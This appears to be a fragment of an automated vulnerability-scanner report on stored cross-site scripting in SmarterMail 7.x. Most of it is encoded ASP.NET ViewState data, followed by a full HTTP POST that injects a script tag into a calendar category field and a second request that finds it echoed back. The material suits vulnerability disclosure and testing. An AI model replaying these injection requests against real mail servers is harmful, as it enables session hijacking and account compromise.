dHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFEUVuYWJsZU11bHRpU2VsZWN0aAUPUmVuZGVySW52aXNpYmxlZwUOUm93SGVhZGVySW1hZ2UFKS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQuZ2lmBRJOYXZpZ2F0aW9uTmV4dFRleHRlBQRNaW5EBgBAVyBTBVEIBQNFUlNoBQ1TZWxlY3RlZERhdGVzDwWPAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkRhdGVUaW1lQ29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAAUSTmF2aWdhdGlvblByZXZUZXh0ZQURVmlld1NlbGVjdG9ySW1hZ2UFKi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzL21pc2MvcmlnaHQyLmdpZgUETWF4RAYAANuZej8xCQ8WCB8MBQxTbWFydGVyVG9vbHMfC2gfCmgfFWhkZBYEHwgFC3JjTWFpblRhYmxlHwkCAhYEHwgFDHJjT3RoZXJNb250aB8JAgJkFgQfCAUKcmNTZWxlY3RlZB8JAgJkFgQfCAUKcmNEaXNhYmxlZB8JAgIWBB8IBQxyY091dE9mUmFuZ2UfCQICFgQfCAUJcmNXZWVrZW5kHwkCAhYEHwgFB3JjSG92ZXIfCQICFgQfCAU2UmFkQ2FsZW5kYXJNb250aFZpZXcgUmFkQ2FsZW5kYXJNb250aFZpZXdfU21hcnRlclRvb2xzHwkCAhYEHwgFCXJjVmlld1NlbB8JAgJkAgMPDxYEHxcFLS9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L1VwY29taW5nLmdpZh8YBS0vQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy8xNngxNi9VcGNvbWluZy5naWYWAh8ZBUpyZXR1cm4gQ2FsZW5kYXJQb3B1cCgkZmluZCgnY3RsMDBfTVBIX0VuZERhdGVQaWNrZXJfU2V0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Y2tlcl9TZXR0aW5nVGV4dAUsY3RsMDAkTVBIJEVuZERhdGVQaWNrZXJfU2V0dGluZ1RleHQkY2FsZW5kYXIFLGN0bDAwJE1QSCRFbmREYXRlUGlja2VyX1NldHRpbmdUZXh0JGNhbGVuZGFyBSxjdGwwMCRNUEgkRW5kRGF0ZVBpY2tlcl9TZXR0aW5nVGV4dCR0aW1lVmlldwUhY3RsMDAkTVBIJGNoa0NhdGVnb3J5XzU4MDc5NjAyOF8wBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiMg8y3AsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAAC0BDYXRlZ29yaWVzAfX////8////BgwAAAAIU2VsZWN0ZWQIAQAB8/////z///8GDgAAAApQYWdlVmlld0lEBg8AAAANQ2F0ZWdvcmllc1RhYgtkBRdjdGwwMCRUUEgkVGFiU3RyaXAkVGFiMw8y3gsAAQAAAP////8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8////5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6/////P///wYHAAAABFRleHQKAfj////8////BgkAAAAKUmVzb3VyY2VJRAYKAAAADEBEZXNjcmlwdGlvbgH1/////P///wYMAAAACFNlbGVjdGVkCAEAAfP////8////Bg4AAAAKUGFnZVZpZXdJRAYPAAAADkRlc2NyaXB0aW9uVGFiC2QFF2N0bDAwJFRQSCRUYWJTdHJpcCRUYWIxDzLWCwABAAAA/////wEAAAAAAAAABAEAAADiAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkRpY3Rpb25hcnlgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0EAAAAB1ZlcnNpb24IQ29tcGFyZXIISGFzaFNpemUNS2V5VmFsdWVQYWlycwADAAMIkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQjmAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXVtdBQAAAAkCAAAABwAAAAkDAAAABAIAAACSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAAAAAAcDAAAAAAEAAAAFAAAAA+QBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBPz////kAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2..
- /Main/frmCalendar.aspx

/Main/frmCalendar.aspx

http://vulnerable.smartermail.7.x.host:9998/Main/frmCalendar.aspx

Injection URL

http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupContactCategories.aspx

Injection Request

POST /Main/frmPopupContactCategories.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmPopupContactCategories.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 443
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

__EVENTTARGET=ctl00%24BrPH%24OKImageButton&__EVENTARGUMENT=1&__VIEWSTATE=%2fwEPDwUKLTE1MzIwNjc1OQ8WBB4QX19fUmVzdWx0RmFpbHVyZWUeEF9fX1Jlc3VsdFN1Y2Nlc3NlFgJmD2QWAgIBD2QWBgIFDxYCHgdWaXNpYmxlaGQCBw9kFgJmD2QWAgIBDxYCHwJoFgICAQ8WAh4EVGV4dGVkAgsPZBYCAgMPZBYCZg9kFgJmDw8WBB4IQ3NzQ2xhc3MFDkluZGVudCBTZXR0aW5nHgRfIVNCAgJkFgICAw8PFgIfA2VkZGTYbBeYmpPfD5OfkuIOw4oB9USDxQ%3d%3d&ctl00%24MPH%24txtCategories_SettingText=%3cscript%3ens(0x005CD1)%3c%2fscript%3e

Identification Request

POST /Main/frmCalendar.aspx HTTP/1.1
Referer: http://vulnerable.smartermail.7.x.host:9998/Main/frmCalendar.aspx
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; CloudScan Vulnerability Crawler http://cloudscan.me)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: vulnerable.smartermail.7.x.host:9998
Cookie: ASP.NET_SessionId=e25dkk45nuvkgrr4d1exuxrn
Content-Length: 14557
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

__EVENTTARGET=ctl00%24MPH%24rightClickMenu&__EVENTARGUMENT=ctl00_MPH_rightClickMenu_menuDelete&__VIEWSTATE=%2fwEPDwUKMTE0MTU5OTM3NQ8WCB4IX19fVGl0bGUFC015IENhbGVuZGFyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeB19fc3RhdGUyjgUAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAwCAAAAT1NNV2ViLCBWZXJzaW9uPTcuMi4zOTI1LjI0NTIxLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWMzOWQzMzQ4NjU2ZTUxNmMMAwAAAFlSZW1vdGVJbnRlcmZhY2UsIFZlcnNpb249Ny4yLjM5MjUuMjQ1MTIsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YzM5ZDMzNDg2NTZlNTE2YwUBAAAAKlNNV2ViLkhlbHBlckNsYXNzZXMuQ2FsZW5kYXIuQ2FsZW5kYXJTdGF0ZQoAAAAER3VpZAxTZWFyY2hTdHJpbmcIQ2F0ZWdvcnkNU2hvd1JlY3VycmluZwpTaG93QWxsRGF5BE1vZGUORm9jdXNlZERhdGVVVEMRUmVzb3VyY2VPd25lclVzZXISUmVzb3VyY2VPd25lckVtYWlsA1NDRAEBAQAABAABAQQBASlTTVdlYi5IZWxwZXJDbGFzc2VzLkNhbGVuZGFyLkNhbGVuZGFyTW9kZQIAAAANPFNtYXJ0ZXJUb29scy5TbWFydGVyTWFpbC5SZW1vdGluZy5TaGFyaW5nLlNoYXJlQ29ubmVjdG9yRGF0YQMAAAACAAAABgQAAAAgNjhiNTM3MmIyMTAyNDZmNTgyZTA1ZmVjMmYxY2Y5NjYGBQAAAAAJBQAAAAEBBfr%2f%2f%2f8pU01XZWIuSGVscGVyQ2xhc3Nlcy5DYWxlbmRhci5DYWxlbmRhck1vZGUBAAAAB3ZhbHVlX18ACAIAAAAAAAAAYHZvp6wwzUgGBwAAAAVkdW1teQYIAAAAEWR1bW15QGhveXRsbGMuY29tCgsWAmYPZBYCAgEPZBYMAgMPZBYEAgEPZBYCAgEPZBYCZg9kFgICAQ9kFgQCAQ9kFgRmDxYCHgdWaXNpYmxlaGQCAQ8WAh8EaGQCAg9kFgJmD2QWAmYPFgIfBGhkAgMPZBYCAgEPZBYCAgEPDxYCHgRUZXh0BQlTZWFyY2guLi5kZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx8EaGQCBg8WAh8EaGQCBw9kFgJmD2QWAgIBDxYCHwRoFgICAQ8WAh8FZWQCCQ9kFgICAw9kFgJmD2QWCAIBD2QWAmYPZBYIZg9kFgICAQ8PFgIeCEltYWdlVXJsBSsvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9NaXNjL05hdkxlZnQucG5nZGQCAQ9kFgICAQ8PFgIfBwUsL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvTWlzYy9OYXZSaWdodC5wbmdkZAICD2QWAgIBDw8WAh8FBRpTYXR1cmRheSwgT2N0b2JlciAwMiwgMjAxMGRkAgMPZBYCAgEPDxYCHwcFMi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L0NhbGVuZGFyTW9udGguZ2lmZGQCAw8WAh8EaGQCBw8PFgIfBGdkFgQCAQ8WAh8EaGQCAw8WAh4LXyFJdGVtQ291bnQCChYUAgEPZBYCZg8VBxNDYWxlbmRhckJ1c2luZXNzRGF5SS9NYWluL0NhbGVuZGFyL2ZybUV2ZW50LmFzcHg%2fZHQ9MTAvMDIvMjAxMCZ0aW1lPTgmdXNlcj1kdW1teSZtYXBwZWQ9ZmFsc2UEOCBBTQE4ATgRUmlnaHRDbGlja2FibGVOZXcDQWx0ZAICD2QWAmYPFQcTQ2FsZW5kYXJCdXNpbmVzc0RheUkvTWFpbi9DYWxlbmRhci9mcm1FdmVudC5hc3B4P2R0PTEwLzAyLzIwMTAmdGltZT05JnVzZXI9ZHVtbXkmbWFwcGVkPWZhbHNlBDkgQU0BOQE5EVJpZ2h0Q2xpY2thYmxlTmV3AGQCAw9kFgJmDxUHE0NhbGVuZGFyQnVzaW5lc3NEYXlKL01haW4vQ2FsZW5kYXIvZnJtRXZlbnQuYXNweD9kdD0xMC8wMi8yMDEwJnRpbWU9MTAmdXNlcj1kdW1teSZtYXBwZWQ9ZmFsc2UFMTAgQU0CMTACMTARUmlnaHRDbGlja2FibGVOZXcDQWx0ZAIED2QWAmYPFQcTQ2FsZW5kYXJCdXNpbmVzc0RheUovTWFpbi9DYWxlbmRhci9mcm1FdmVudC5hc3B4P2R0PTEwLzAyLzIwMTAmdGltZT0xMSZ1c2VyPWR1bW15Jm1hcHBlZD1mYWxzZQUxMSBBTQIxMQIxMRFSaWdodENsaWNrYWJsZU5ldwBkAgUPZBYCZg8VBxNDYWxlbmRhckJ1c2luZXNzRGF5Si9NYWluL0NhbGVuZGFyL2ZybUV2ZW50LmFzcHg%2fZHQ9MTAvMDIvMjAxMCZ0aW1lPTEyJnVzZXI9ZHVtbXkmbWFwcGVkPWZhbHNlBTEyIFBNAjEyAjEyEVJpZ2h0Q2xpY2thYmxlTmV3A0FsdGQCBg9kFgJmDxUHE0NhbGVuZGFyQnVzaW5lc3NEYXlKL01haW4vQ2FsZW5kYXIvZnJtRXZlbnQuYXNweD9kdD0xMC8wMi8yMDEwJnRpbWU9MTMmdXNlcj1kdW1teSZtYXBwZWQ9ZmFsc2UEMSBQTQIxMwIxMxFSaWdodENsaWNrYWJsZU5ldwBkAgcPZBYCZg8VBxNDYWxlbmRhckJ1c2luZXNzRGF5Si9NYWluL0NhbGVuZGFyL2ZybUV2ZW50LmFzcHg%2fZHQ9MTAvMDIvMjAxMCZ0aW1lPTE0JnVzZXI9ZHVtbXkmbWFwcGVkPWZhbHNlBDIgUE0CMTQCMTQRUmlnaHRDbGlja2FibGVOZXcDQWx0ZAIID2QWAmYPFQcTQ2FsZW5kYXJCdXNpbmVzc0RheUovTWFpbi9DYWxlbmRhci9mcm1FdmVudC5hc3B4P2R0PTEwLzAyLzIwMTAmdGltZT0xNSZ1c2VyPWR1bW15Jm1hcHBlZD1mYWxzZQQzIFBNAjE1AjE1EVJpZ2h0Q2xpY2thYmxlTmV3AGQCCQ9kFgJmDxUHE0NhbGVuZGFyQnVzaW5lc3NEYXlKL01haW4vQ2FsZW5kYXIvZnJtRXZlbnQuYXNweD9kdD0xMC8wMi8yMDEwJnRpbWU9MTYmdXNlcj1kdW1teSZtYXBwZWQ9ZmFsc2UENCB